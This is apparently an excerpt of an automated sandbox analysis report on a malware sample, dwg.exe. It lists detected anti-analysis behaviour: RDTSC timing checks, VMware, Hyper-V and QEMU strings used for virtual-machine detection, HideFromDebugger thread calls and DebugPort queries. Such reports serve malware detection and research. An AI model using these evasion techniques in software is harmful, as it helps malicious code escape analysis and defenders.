      Source: C:\Windows\SysWOW64\cmmon32.exeRDTSC instruction interceptor: First address: 000000000236898E second address: 0000000002368994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E6233 rdtsc
      Source: C:\Windows\explorer.exe TID: 6896Thread sleep time: -40000s >= -30000s
      Source: C:\Windows\SysWOW64\cmmon32.exe TID: 6888Thread sleep time: -40000s >= -30000s
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\cmmon32.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: dwg.exe, 00000004.00000003.252823162.0000000000846000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW*CkF
      Source: explorer.exe, 00000005.00000000.274508758.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000005.00000000.274508758.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
      Source: explorer.exe, 00000005.00000000.274271564.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000005.00000000.273860626.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000005.00000000.277858620.000000000F59B000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}i
      Source: dwg.exe, 00000004.00000003.252823162.0000000000846000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000005.00000000.266925690.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
      Source: explorer.exe, 00000005.00000000.277858620.000000000F59B000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ger_cw5n1h2txyewyF
      Source: explorer.exe, 00000005.00000000.274508758.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
      Source: explorer.exe, 00000005.00000000.274508758.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
      Source: explorer.exe, 00000005.00000000.274627577.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
      Source: explorer.exe, 00000005.00000002.474048022.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
      Source: explorer.exe, 00000005.00000000.273860626.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: dwg.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000005.00000000.273860626.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000005.00000000.273860626.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\dwg.exeProcess information queried: ProcessInformation

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E6233 NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,6DDB9555,?,321C9581
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\dwg.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\dwg.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\dwg.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\dwg.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\dwg.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\dwg.exeProcess queried: DebugPort
      Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPort
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E6233 rdtsc
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E3230 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E583D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E4A27 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E1870 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E2CC1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E4EF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E1D02 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E1F93 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E49AA mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021E1FD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13A61C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E10C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E10C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E10C600 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E138E00 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C1608 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1BFE3F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E10E620 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E117E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E117E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E117E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E117E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E117E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E117E41 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1CAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1CAE44 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E12AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E12AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E12AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E12AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E12AE73 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E11766D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E19FE87 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D0EA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1846A7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D8ED6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E148EC7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1BFEC0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1336CC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1316E0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1176E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E12F716 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E19FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E19FF10 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D070D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13A70E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13E730 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E104F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E104F2E mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E11EF40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E11FF60 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D8F6A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E118794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E187794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E187794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E187794 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1437F5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D740D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E186C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E186C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E186C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E186C0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C1C06 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13BC2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E19C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E19C450 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13A44B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E12746D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E11849B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D8CD6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C14FB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E186CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E186CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E186CF0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E10AD30 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E113D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1CE539 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E134D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E134D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E134D3B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D8D34 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E18A537 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E127D50 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E143D43 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E183540 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E12C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E12C577 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13FD9B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E132581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E132581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E132581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E132581 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E102D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E102D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E102D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E102D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E102D8A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E131DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E131DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E131DB5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D05AC mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1335A1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E186DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E186DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E186DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E186DC9 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E186DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E186DC9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1B8DF1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E11D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E11D5E0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1CFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1CFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1CFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1CFDE2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E105210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E105210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E105210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E105210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E10AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E10AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E123A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E118A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E144A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E144A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1CEA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E194257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E109240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E109240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E109240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E109240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E14927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1BB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1BB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D8A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E11AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E11AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13FAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1052A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E132ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E132AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D8B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E10F358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E10DB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E133B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E133B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E10DB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E13B390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E132397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1C138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1BD380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E111B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E111B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E1D5BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E134BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E134BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\dwg.exeCode function: 4_2_1E134BAD mov eax, dword ptr fs:[00000030h]
